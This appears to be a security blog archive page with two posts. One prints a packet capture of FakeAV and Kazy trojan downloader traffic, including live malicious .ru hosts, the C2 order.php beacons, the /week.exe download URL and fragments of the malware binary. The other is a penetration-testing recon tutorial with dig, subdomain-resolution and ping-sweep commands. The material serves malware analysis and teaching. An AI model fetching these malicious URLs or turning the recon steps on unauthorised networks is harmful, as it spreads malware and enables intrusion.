Monthly Archives: June 2016

Traffic Sample PCAP of FakeAV Malware and Kazy Trojan Downloader

Two key indicators:

FakeAV POST – POST /hrrgkkwhjdwwwww/order.php?pid=390 (attempting to setup a payment for the FakeAV with the pid linking to the current session)

Trojan Downloader function – GET /week.exe HTTP/1.1

 

 

2015-08-27 11:39:35.045855 ARP, Request who-has 192.168.56.1 tell 192.168.56.10, length 28
……..
.’*….8
……..8.
2015-08-27 11:39:35.046218 ARP, Reply 192.168.56.1 is-at 0a:00:27:00:00:00, length 46
……..
.’…..8.
.’*….8
………………
2015-08-27 11:39:35.046432 IP 192.168.56.10.59725 > 8.8.8.8.53: 60725+ A? microsoft.com. (31)
E..;6………8
…..M.5.’./.5………. microsoft.com…..
2015-08-27 11:39:35.063594 IP 8.8.8.8.53 > 192.168.56.10.59725: 60725 2/0/0 A 134.170.188.221, A 134.170.185.46 (63)
E..[Bg..1.>i……8
.5.M.G1Y.5………. microsoft.com…………..Y……………Y……
2015-08-27 11:39:35.096336 IP 192.168.56.10.49240 > 134.170.188.221.80: Flags [S], seq 759739050, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..46.@…….8
…..X.P-H…….. .r:…………..
2015-08-27 11:39:35.150435 IP 134.170.188.221.80 > 192.168.56.10.49240: Flags [S.], seq 4248410354, ack 759739051, win 8190, options [mss 1460,nop,wscale 4,nop,nop,sackOK], length 0
E(.4
E@…A…….8
.P.X.9..-H………………….
2015-08-27 11:39:35.150683 IP 192.168.56.10.49240 > 134.170.188.221.80: Flags [.], ack 1, win 256, length 0
E..(6.@…….8
…..X.P-H…9..P…;…
2015-08-27 11:39:35.150905 IP 192.168.56.10.49240 > 134.170.188.221.80: Flags [F.], seq 1, ack 1, win 256, length 0
E..(6.@…….8
…..X.P-H…9..P…;…
2015-08-27 11:39:35.181327 IP6 fe80::b094:423d:bad5:e23c.61490 > ff02::1:3.5355: UDP, length 28
`….$…………B=…<……………..2…$)).a……….
1Gr2hcLa6j…..
2015-08-27 11:39:35.183294 IP 192.168.56.10.63629 > 224.0.0.252.5355: UDP, length 28
E..86………8
………$…a……….
1Gr2hcLa6j…..
2015-08-27 11:39:35.205418 IP 134.170.188.221.80 > 192.168.56.10.49240: Flags [F.], seq 1, ack 2, win 511, length 0
E(.(.i@…>…….8
.P.X.9..-H..P…:………
2015-08-27 11:39:35.205529 IP 192.168.56.10.49240 > 134.170.188.221.80: Flags [.], ack 2, win 256, length 0
E..(6.@…….8
…..X.P-H…9..P…;…
2015-08-27 11:39:35.291613 IP6 fe80::b094:423d:bad5:e23c.61490 > ff02::1:3.5355: UDP, length 28
`….$…………B=…<……………..2…$)).a……….
1Gr2hcLa6j…..
2015-08-27 11:39:35.291891 IP 192.168.56.10.63629 > 224.0.0.252.5355: UDP, length 28
E..86………8
………$…a……….
1Gr2hcLa6j…..
2015-08-27 11:39:37.828655 IP 192.168.56.10.52622 > 8.8.8.8.53: 9094+ A? vh86987.eurodir.ru. (36)
E..@6………8
…….5.,YG#…………vh86987.eurodir.ru…..
2015-08-27 11:39:38.066602 IP 8.8.8.8.53 > 192.168.56.10.52622: 9094 1/0/0 A 46.30.40.95 (52)
E..P….1………8
.5…<..#…………vh86987.eurodir.ru…………..W….(_
2015-08-27 11:39:35.291613 IP6 fe80::b094:423d:bad5:e23c.61490 > ff02::1:3.5355: UDP, length 28
`….$…………B=…<……………..2…$)).a……….
1Gr2hcLa6j…..
2015-08-27 11:39:35.291891 IP 192.168.56.10.63629 > 224.0.0.252.5355: UDP, length 28
E..86………8
………$…a……….
1Gr2hcLa6j…..
2015-08-27 11:39:37.828655 IP 192.168.56.10.52622 > 8.8.8.8.53: 9094+ A? vh86987.eurodir.ru. (36)
E..@6………8
…….5.,YG#…………vh86987.eurodir.ru…..
2015-08-27 11:39:38.066602 IP 8.8.8.8.53 > 192.168.56.10.52622: 9094 1/0/0 A 46.30.40.95 (52)
E..P….1………8
.5…<..#…………vh86987.eurodir.ru…………..W….(_
2015-08-27 11:39:38.969072 IP 192.168.56.10.49241 > 46.30.40.95.80: Flags [S], seq 1389821042, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..46.@…t…8
..(_.Y.PR..r…… ……………..
2015-08-27 11:39:39.090116 IP 46.30.40.95.80 > 192.168.56.10.49241: Flags [S.], seq 2866732242, ack 1389821043, win 14600, options [mss 1460,nop,nop,sackOK,nop,wscale 9], length 0
E(.4..@.3..l..(_..8
.P.Y….R..s..9.O”………….
2015-08-27 11:39:39.090503 IP 192.168.56.10.49241 > 46.30.40.95.80: Flags [.], ack 1, win 16425, length 0
E..(6.@…t…8
..(_.Y.PR..s….P.@)….
2015-08-27 11:39:39.092478 IP 192.168.56.10.49241 > 46.30.40.95.80: Flags [P.], seq 1:359, ack 1, win 16425, length 358: HTTP: POST /hrrgkkwhjdwwwww/order.php?pid=390 HTTP/1.1
E…6.@…sC..8
..(_.Y.PR..s….P.@)….POST /hrrgkkwhjdwwwww/order.php?pid=390 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: vh86987.eurodir.ru
Content-Length: 966
Cache-Control: no-cache
2015-08-27 11:39:39.092812 IP 192.168.56.10.49241 > 46.30.40.95.80: Flags [P.], seq 359:1325, ack 1, win 16425, length 966: HTTP
E…6.@…p…8
..(_.Y.PR…….P.@)….eimwae=88789850&gmsekqci=16FF0EB00EA6433310B324B2F7&iqym=70AFD9C6AD22E1E3A0F45B4858441F2400042818E925A56C2F84731B45B0C8633BCF8C5C32D9CFD1461B4996588285DC361C3F38D767DCD186A4F22F6A1E605011AC39E9376815EDFBC9E2358D04CA9B862F3412BD50237F4394C1360B49FDC57AD69F9B90888161EDA880C787A0B046D9564542F8612123866D348695899174B59EFF623413D96BDE9C297B0F88F081E65D539E25C2C5A72C730662927FCB9B84189B97&kueueo1=61F04BC27EF021C250F01EC245F003C243F01CC266F010C256F010C27EF014C25AF001C24EF01EC250F014C250F02DC24DF01CC25BF01DC241F000C249F002C255F05FC247F009C247F0&kueueo2=44F018C250F014C244F01EC25AF05FC247F009C247F0&kueueo3=72F022C272F024C260F026C271F05CC272F032C27EF021C271F021C277F033C275F022C2&kueueo4=6BF01FC256F014C24EF059C270F058C202F029C247F01EC24CF059C270F058C202F032C272F024C202F034C211F05CC213F043C210F044C202F007C211F051C262F051C211F05FC210F041C265F039C258F0&kueueo5=74F018C250F005C257F010C24EF033C24DF009C202F036C250F010C252F019C24BF012C251F051C263F015C243F001C256F014C250F0
2015-08-27 11:39:39.213414 IP 46.30.40.95.80 > 192.168.56.10.49241: Flags [.], ack 359, win 31, length 0
E(.(F.@.3…..(_..8
.P.Y….R…P….y……..
2015-08-27 11:39:39.213445 IP 46.30.40.95.80 > 192.168.56.10.49241: Flags [.], ack 1325, win 35, length 0
2015-08-27 11:39:39.282319 IP 46.30.40.95.80 > 192.168.56.10.49241: Flags [P.], seq 1:350, ack 1325, win 35, length 349: HTTP: HTTP/1.1 200 OK
E(..F.@.3..b..(_..8
.P.Y….R…P..#.1..HTTP/1.1 200 OK
Server: nginx
Date: Thu, 27 Aug 2015 15:39:39 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.42

a4
..lw.d./…..O…..V.POE……gUm7H.mj.%6..4e:…o.1.)….;…&S..V.X .6..y…_E.j.i.`..Z……..VHK.J.I..g..A..,.`3:?G7…[..v’..D…”.Z..f..+.5.s..V…….l1G..v.
0
2015-08-27 11:39:39.478157 IP 192.168.56.10.49241 > 46.30.40.95.80: Flags [.], ack 350, win 16337, length 0
E..(6.@…t…8
..(_.Y.PR……0P.?…..
2015-08-27 11:39:44.332404 IP 192.168.56.10.49241 > 46.30.40.95.80: Flags [P.], seq 1325:2068, ack 350, win 16337, length 743: HTTP: POST /hrrgkkwhjdwwwww/order.php HTTP/1.1
E…6.@…q…8
..(_.Y.PR……0P.?…..POST /hrrgkkwhjdwwwww/order.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: vh86987.eurodir.ru
Content-Length: 393
Cache-Control: no-cache

qgwm=7D30747F51F23222258A85AEAA8F38429F&ocqesgui=27258430&skcume=16290CA72D61C87DD39A110902ED31D2A44757B295E924EF5B8D42E53BE86B4170E0E3577743D0C1B86223D57598EA0166E96E7B06ADA2F14C37205259180DCB892E1B5B9B4F891A4042EB249E6F25DBC27C9D070224AB2D56E8E038FAC6FA9CE0E0C78D309452C9ABC349FCD11159B0D87E7307C29E5104B70DA601CD9C0CDE5A7881DFDEB9A8BB0F2AF4D4D51BD93B1EB30CB6C18A5780EC63223F1DF35BBFB789BFB0
2015-08-27 11:39:44.370298 IP 192.168.56.10.61985 > 8.8.8.8.53: 63530+ A? nowakdbo.bget.ru. (34)
E..>6………8
…..!.5.*.M.*………..nowakdbo.bget.ru…..
2015-08-27 11:39:44.450567 IP6 fe80::b094:423d:bad5:e23c.57441 > ff02::1:3.5355: UDP, length 28
`….$…………B=…<……………..a…$…-……….
1Gr2hcLa6j…..
2015-08-27 11:39:44.451157 IP 192.168.56.10.57321 > 224.0.0.252.5355: UDP, length 28
E..86………8
………$.b.-……….
2015-08-27 11:39:44.453354 IP 46.30.40.95.80 > 192.168.56.10.49241: Flags [.], ack 2068, win 39, length 0
E(.(F.@.3…..(_..8
.P.Y…0R…P..’.g……..
2015-08-27 11:39:44.473743 IP 46.30.40.95.80 > 192.168.56.10.49241: Flags [P.], seq 350:628, ack 2068, win 39, length 278: HTTP: HTTP/1.1 200 OK
E(.>F.@.3…..(_..8
.P.Y…0R…P..’.i..HTTP/1.1 200 OK
Server: nginx
Date: Thu, 27 Aug 2015 15:39:44 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.42

5d
…….>.”……….O’….I&S*8bQP..J…Ub”….R….
.$..Kmm……V.q…L.ZL..LD.[..b.]4…..
0
2015-08-27 11:39:44.558406 IP6 fe80::b094:423d:bad5:e23c.57441 > ff02::1:3.5355: UDP, length 28
`….$…………B=…<……………..a…$…-……….
1Gr2hcLa6j…..
2015-08-27 11:39:44.558725 IP 192.168.56.10.57321 > 224.0.0.252.5355: UDP, length 28
E..86………8
………$.b.-……….
1Gr2hcLa6j…..
2015-08-27 11:39:44.611693 IP 8.8.8.8.53 > 192.168.56.10.61985: 63530 1/0/0 A 5.101.152.71 (50)
E..Nu…1.
…….8
.5.!.:>..*………..nowakdbo.bget.ru…………..W…e.G

2015-08-27 11:39:44.750140 IP 192.168.56.10.49242 > 5.101.152.71.80: Flags [P.], seq 1:261, ack 1, win 16425, length 260: HTTP: GET /week.exe HTTP/1.1
E..,7.@…,j..8
.e.G.Z.P[\.ME/..P.@)….GET /week.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: nowakdbo.bget.ru
Cache-Control: no-cache
2015-08-27 11:39:44.885681 IP 5.101.152.71.80 > 192.168.56.10.49242: Flags [.], ack 261, win 134, length 0
E..(..@.9….e.G..8
.P.ZE/..[\.QP…5Z……..
2015-08-27 11:39:44.885691 IP 5.101.152.71.80 > 192.168.56.10.49242: Flags [.], seq 1:1461, ack 261, win 134, length 1460: HTTP: HTTP/1.1 200 OK
E…..@.9….e.G..8
.P.ZE/..[\.QP….;..HTTP/1.1 200 OK
Server: nginx/1.9.4
Date: Thu, 27 Aug 2015 15:39:44 GMT
Content-Type: application/octet-stream
Content-Length: 237568
Last-Modified: Thu, 27 Aug 2015 13:45:36 GMT
Connection: keep-alive
Keep-Alive: timeout=30
ETag: “55df1480-3a000″
Expires: Sat, 26 Sep 2015 15:39:44 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..
$………U.I.;.I.;.I.;.I.:.Z.;…(.L.;…).O.;.RichI.;……………..PE..L…g.#P……………..P…@…….I…….`….@……………………………………………………………….ta…………………………………_……………………………………….@`..4……………………….text….I…….P……………… ..`.rdata..b….`…….`…………..@..@.data……..p…….p…………..@….rsrc………… ………………@..@…………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………
2015-08-27 11:39:44.885699 IP 5.101.152.71.80 > 192.168.56.10.49242: Flags [.], seq 1461:2921, ack 261, win 134, length 1460: HTTP
E…..@.9….e.G..8
.P.ZE/..[\.QP…)…………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………..
2015-08-27 11:39:44.885705 IP 5.101.152.71.80 > 192.168.56.10.49242: Flags [.], seq 2921:4381, ack 261, win 134, length 1460: HTTP
E…..@.9….e.G..8
.P.ZE/.u[\.QP…$>……………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………..
2015-08-27 11:39:57.937205 IP 5.101.152.71.80 > 192.168.56.10.49242: Flags [.], seq 24821:26281, ack 261, win 134, length 1460: HTTP
E…..@.9….e.G..8
.P.ZE0..[\.QP…………………………………………………………………………………………………………g.#P……..!….`…`..RSDS2>..8p..-…p…….fase.pdb….,d..Fd…c..Zc..Hc…d…c…d…c…c…c…c..nc..^d…….e..zd…d…d…e…d..de…d…d…d..Ve…d..”e…e…d..Je..<e…….e…e…….e…e…e…….e…e…….f..Ff..4f…f…f…f..\f…f…f..$f…f..rf…….g..~g..6g…g…h..Dg..$g..Fh…g…g..dg..”h…h…f…g…g…g…g..Vg…h…….b……….nd..@`..Pb……….te..|`…b………..e…`…b………..e…`…b………..f…`…b………..f…`…b……….Th.. a………………….,d..Fd…c..Zc..Hc…d…c…d…c…c…c…c..nc..^d…….e..zd…d…d…e…d..de…d…d…d..Ve…d..”e…e…d..Je..<e…….e…e…….e…e…e…….e…e…….f..Ff..4f…f…f…f..\f…f…f..$f…f..rf…….g..~g..6g…g…h..Dg..$g..Fh…g…g..dg..”h…h…f…g…g…g…g..Vg…h……..CertAlgIdToOID….CertCreateContext.S.CertCreateCTLContext..&.CertDuplicateStore….CryptEnumOIDInfo….CertCloseStore..1.CertFindAttribute.J.CertGetNameStringA..b.CertSetStoreProperty….CryptMsgClose.6.CertFindChainInStore..”.CertDuplicateCRLContext…CertCreateCRLContext..W.CertOpenStore.crypt32.dll…InsertMenuW…GetWindowTextA….LoadCursorA.@.CreateDesktopA….EnumDesktopsA…LoadImageW….LoadBitmapW.S.CreateWindowExW…SendMessageA… wsprintfW…DrawTextExA…EndDialog…InsertMenuW…MessageBo
2015-08-27 11:39:57.937321 IP 192.168.56.10.49242 > 5.101.152.71.80: Flags [.], ack 26281, win 16425, length 0
E..(70@…-A..8
.e.G.Z.P[\.QE0..P.@)….
2015-08-27 11:40:01.992399 ARP, Request who-has 192.168.56.1 (0a:00:27:00:00:00) tell 192.168.56.10, length 28
……..
.’*….8

.’…..8.
2015-08-27 11:40:03.061681 IP 5.101.152.71.80 > 192.168.56.10.49242: Flags [.], seq 26281:27741, ack 261, win 134, length 1460: HTTP
E…..@.9….e.G..8
.P.ZE0..[\.QP…O…xA. .GetFocus..
.OemToCharA….FindWindowExA.user32.dll….GradientFill….vSetDdrawflag.msimg32.DLL…MD5Final….MD5Update. .CDLocateRng.cryptdll.dll….TraceSQLConnect…TraceSQLBindCol.odbctrac.dll..y.GetThemeSysSize.i.GetThemeFont..d.GetThemeSysBool.|.GetThemeTextMetrics.6.DrawThemeBackground…IsThemeActive.5.CloseThemeData..j.GetThemeInt.e.GetThemeColor…OpenThemeData.q.GetThemeRect….SetWindowTheme..uxtheme.dll…GetProcAddress….LoadLibraryA..4.FindFirstFileA..e.CompareStringW..].FoldStringA.e.GetStartupInfoW…GetFileSize. .GetLogicalDriveStringsA…InitializeCriticalSection…GetLocaleInfoW….ReplaceFileW….CreateDirectoryW….GetDateFormatA….HeapFree….WaitForSingleObject…GetCommandLineW…GetOEMCP….ReadFile….GetCurrentDirectoryA….TlsGetValue.kernel32.dll……………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………….

Share Button

Penetration Testing Reconassaince Command Line Tricks Dig, Mass Domain Resolution, Ping Sweeping

Here are some simple command line tricks to help while doing recon on your target network/host
A simple way to automatically resolve domain names, can be used with a for loop to resolve a massive list of domain names, you can also add a cronjob and create an .out file if you want to track domain name resolution changes. First lets set a regular expression variable that will extract only a legit IPs from the output:
root@computersecurity:~/# IP=(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)
now lets use the variable to do a simple domain name resolution and only return the IP address of the domain being resolved (we’ll remove Google’s DNS server from the results)
root@computersecurity:~/# dig @8.8.8.8 computersecurity.org | grep -E -o $IP | grep -v 8.8.8.8
– The raw output is just the IP below:
104.238.84.235
 Another easy way to profile your target is to download their webpage content or homepage and extract out all of the subdomains out and resolve them to IP addresses to map out their network infrastructure, here is an example below of the index page of msn:
root@computersecurity:~/# wget http://www.msn.com
–2016-06-25 00:52:45–  http://www.msn.com/
Resolving www.msn.com (www.msn.com)… 204.79.197.203
Connecting to www.msn.com (www.msn.com)|204.79.197.203|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 40206 (39K) [text/html]
Saving to: ‘index.html’index.html          100%[===================>]  39.26K  –.-KB/s    in 0.01s2016-06-25 00:52:45 (2.97 MB/s) – ‘index.html’ saved [40206/40206]
We run this simple command:
root@computersecurity:~/# for url in $(grep -o ‘[A-Za-z0-9_\.-]*\.*msn.com’ index.html | sort -u); do host $url | grep “has address”|cut -d” ” -f4;done
137.117.100.176
65.52.108.11
104.85.61.237
204.79.197.200
40.114.54.223
204.79.197.203
Just like that we see that msn has a lot of subdomains hosted all over the place
Once you have IP ranges and you are authorized to touch them we can write a simple bash script that do a ping sweep of a network in seconds – here is the sweep of my own network completing in less than a second

root@computersecurity:~/# cat > pingsweep.sh
#!/bin/bash
for ip in $(seq 1 255); do
ping -c 1 192.168.1.$ip | grep “bytes from” | cut -d” ” -f4 | cut -d”:” -f1 &
done
root@computersecurity:~/# chmod +x *.sh
root@computersecurity:~/# ./pingsweep.sh
192.168.1.1
192.168.1.2
192.168.1.101
192.168.1.100
192.168.1.107

 

Share Button